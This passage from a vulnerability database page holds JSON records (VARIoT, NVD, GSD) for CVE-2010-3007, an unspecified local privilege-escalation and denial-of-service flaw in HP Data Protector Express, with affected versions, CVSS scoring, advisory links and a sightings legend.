"id": "116276"
},
{
"date": "2012-08-29T14:18:46",
"db": "PACKETSTORM",
"id": "116000"
},
{
"date": "2010-09-09T22:00:02.437000",
"db": "NVD",
"id": "CVE-2010-3007"
},
{
"date": "2010-09-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201009-078"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-09-13T00:00:00",
"db": "ZDI",
"id": "ZDI-10-174"
},
{
"date": "2012-08-29T00:00:00",
"db": "ZDI",
"id": "ZDI-12-173"
},
{
"date": "2010-09-09T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-1923"
},
{
"date": "2010-09-08T00:00:00",
"db": "BID",
"id": "43105"
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-003000"
},
{
"date": "2019-10-09T23:01:11.517000",
"db": "NVD",
"id": "CVE-2010-3007"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201009-078"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "BID",
"id": "43105"
},
{
"db": "PACKETSTORM",
"id": "93678"
},
{
"db": "CNNVD",
"id": "CNNVD-201009-078"
}
],
"trust": 1.0
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "HP Data Protector Express and Data Protector Express SSE Vulnerability gained in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-003000"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201009-078"
}
],
"trust": 0.6
}
}
FKIE_CVE-2010-3007
Vulnerability from fkie_nvd - Published: 2010-09-09 22:00 - Updated: 2025-04-11 00:51
Severity ?
Summary
Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 allows local users to gain privileges or cause a denial of service via unknown vectors.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| hp | data_protector_express | 3.1 | |
| hp | data_protector_express | 3.5 | |
| hp | data_protector_express | 3.5 | |
| hp | data_protector_express | 4.0 | |
| hp | data_protector_express | 4.0 | |
| hp | data_protector_express | 3.1 | |
| hp | data_protector_express | 3.5 | |
| hp | data_protector_express | 3.5 | |
| hp | data_protector_express | 4.0 | |
| hp | data_protector_express | 4.0 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hp:data_protector_express:3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "44046D76-CF1E-4BD2-B2BC-DDAE8552EB21",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:hp:data_protector_express:3.5:sp1:*:*:*:*:*:*",
"matchCriteriaId": "0B416366-2680-41E2-ABF9-5CD8D89C7FBA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:hp:data_protector_express:3.5:sp2:*:*:*:*:*:*",
"matchCriteriaId": "3F5B5D2E-4692-4DA5-805E-B449CFD9DA5A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:hp:data_protector_express:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "87954300-744A-4FAA-AC4E-1F1A500A8B08",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:hp:data_protector_express:4.0:sp1:*:*:*:*:*:*",
"matchCriteriaId": "AED70E63-BA67-4A68-A121-C3E80F2D1EF0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hp:data_protector_express:3.1:*:single_server:*:*:*:*:*",
"matchCriteriaId": "B9F2AC98-5D46-4BC6-884F-60E6D2047B80",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:hp:data_protector_express:3.5:sp1:single_server:*:*:*:*:*",
"matchCriteriaId": "A3FC228A-4638-41A0-BBA6-44D1C86FE834",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:hp:data_protector_express:3.5:sp2:single_server:*:*:*:*:*",
"matchCriteriaId": "2B5AB9FB-79BF-456B-9698-FB8A28688CFA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:hp:data_protector_express:4.0:*:single_server:*:*:*:*:*",
"matchCriteriaId": "A7929FE9-5770-4E88-9A0F-15265A75CCD1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:hp:data_protector_express:4.0:sp1:single_server:*:*:*:*:*",
"matchCriteriaId": "76847B5C-BF40-4825-A468-7B857489570C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 allows local users to gain privileges or cause a denial of service via unknown vectors."
},
{
"lang": "es",
"value": "Vulnerabilidad no especificada en HP Data Protector Express y Data Protector Express Single Server Edition (SSE), v3.x anterior a build 56936 y v4.x anterior a build 56906 permite a usuarios locales conseguir privilegios o causar una denegaci\u00f3n de servicio a trav\u00e9s de vectores desconocidos."
}
],
"id": "CVE-2010-3007",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2010-09-09T22:00:02.437",
"references": [
{
"source": "hp-security-alert@hp.com",
"url": "http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535"
}
],
"sourceIdentifier": "hp-security-alert@hp.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
GSD-2010-3007
Vulnerability from gsd - Updated: 2023-12-13 01:21Details
Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 allows local users to gain privileges or cause a denial of service via unknown vectors.
Aliases
Aliases
{
"GSD": {
"alias": "CVE-2010-3007",
"description": "Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 allows local users to gain privileges or cause a denial of service via unknown vectors.",
"id": "GSD-2010-3007",
"references": [
"https://packetstormsecurity.com/files/cve/CVE-2010-3007"
]
},
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2010-3007"
],
"details": "Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 allows local users to gain privileges or cause a denial of service via unknown vectors.",
"id": "GSD-2010-3007",
"modified": "2023-12-13T01:21:34.640830Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "hp-security-alert@hp.com",
"ID": "CVE-2010-3007",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 allows local users to gain privileges or cause a denial of service via unknown vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "HPSBMA02576",
"refsource": "HP",
"url": "http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535"
},
{
"name": "SSRT090231",
"refsource": "HP",
"url": "http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535"
}
]
}
},
"nvd.nist.gov": {
"configurations": {
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:hp:data_protector_express:3.5:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:hp:data_protector_express:4.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:hp:data_protector_express:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:hp:data_protector_express:3.5:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:hp:data_protector_express:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:hp:data_protector_express:4.0:sp1:single_server:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:hp:data_protector_express:4.0:*:single_server:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:hp:data_protector_express:3.5:sp2:single_server:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:hp:data_protector_express:3.5:sp1:single_server:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:hp:data_protector_express:3.1:*:single_server:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
},
"cve": {
"CVE_data_meta": {
"ASSIGNER": "hp-security-alert@hp.com",
"ID": "CVE-2010-3007"
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "en",
"value": "Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 allows local users to gain privileges or cause a denial of service via unknown vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "HPSBMA02576",
"refsource": "HP",
"tags": [],
"url": "http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535"
}
]
}
},
"impact": {
"baseMetricV2": {
"cvssV2": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"userInteractionRequired": false
}
},
"lastModifiedDate": "2019-10-09T23:01Z",
"publishedDate": "2010-09-09T22:00Z"
}
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…